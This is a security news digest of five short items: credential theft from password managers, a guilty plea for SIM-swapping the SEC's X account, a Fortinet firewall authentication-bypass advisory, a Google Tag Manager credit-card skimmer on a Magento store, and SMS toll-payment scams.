Security attacks on password managers have soared
Cybercriminals are increasingly targeting password managers in an attempt to break into various important digital accounts. Picus Security detailed its findings in the newly-released Red Report 2025, based on an in-depth analysis of more than a million malware variants collected last year, finding a quarter of all malware (25%) targeted credentials in password stores. This, the researchers claim, represents a three-fold increase compared to the year before. “For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 93% of all malicious actions in 2024.”
Man who SIM-swapped the SEC’s X account pleads guilty
An Alabama man is pleading guilty after being charged with SIM swapping the Securities and Exchange Commission’s (SEC) X account in January last year. Twenty-five-year-old Eric Council Jr was charged with the offense in October and the Justice Department said at the time he was part of a group who attempted to manipulate the price of cryptocurrencies to their advantage. Announcing Council’s guilty plea on Monday, the department did not mention the motives behind the incident, but once again noted that the price of Bitcoin rose by more than $1,000 after the SEC’s account falsely confirmed the approval of BTC Exchange Traded Funds.
Fortinet discloses second firewall auth bypass patched in January
After publishing our story, Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January. Furthermore, even though today’s updated advisory indicates that both flaws were exploited in attacks and even includes a workaround for the new CSF proxy requests exploitation pathway, Fortinet says that only CVE-2024-55591 was exploited. Fortinet told BleepingComputer that if a customer previously upgraded based on the guidance in FG-IR-24-535 / CVE-2024-55591, then they are already protected against the newly disclosed vulnerability.
Crooks use Google Tag Manager skimmer to steal credit card data from a Magento-based e-stores
Sucuri researchers found threat actors using Google Tag Manager (GTM) to deploy e-skimmer malware on a Magento eCommerce site. Google Tag Manager (GTM) is a free tool that lets website owners manage marketing tags without modifying site code, simplifying analytics and ad tracking. Sucuri inspected the website and discovered the malicious code hidden in a website’s database (cms_block.content), disguised as a Google Tag Manager and Google Analytics script to evade detection. This isn’t the first time that Sucuri documented the use of GTM to deploy e-skimmer on e-store, in 2024, the experts detailed how Magecart veteran ATMZOW was using Google Tag Manager to deliver malware. The researchers pointed out that the tactic is still being used by threat actors in the wild.
Toll booth bandits continue to scam via SMS messages
North American drivers are continuing to be barraged by waves of scam text messages, telling them that they owe money on unpaid tolls. Last month we described on Hot for Security how US authorities had issued a warning about SMS phishing attacks from scammers posing as tolling agencies. For instance, Texas-based audience producer Gwen Howerton described on Bluesky how she had been duped by an unpaid toll scam after she had driven a rental car on the Dallas North Tollway – and, not being aware of the correct way to pay a toll, had believed the overdue payment demand she received to be genuine.
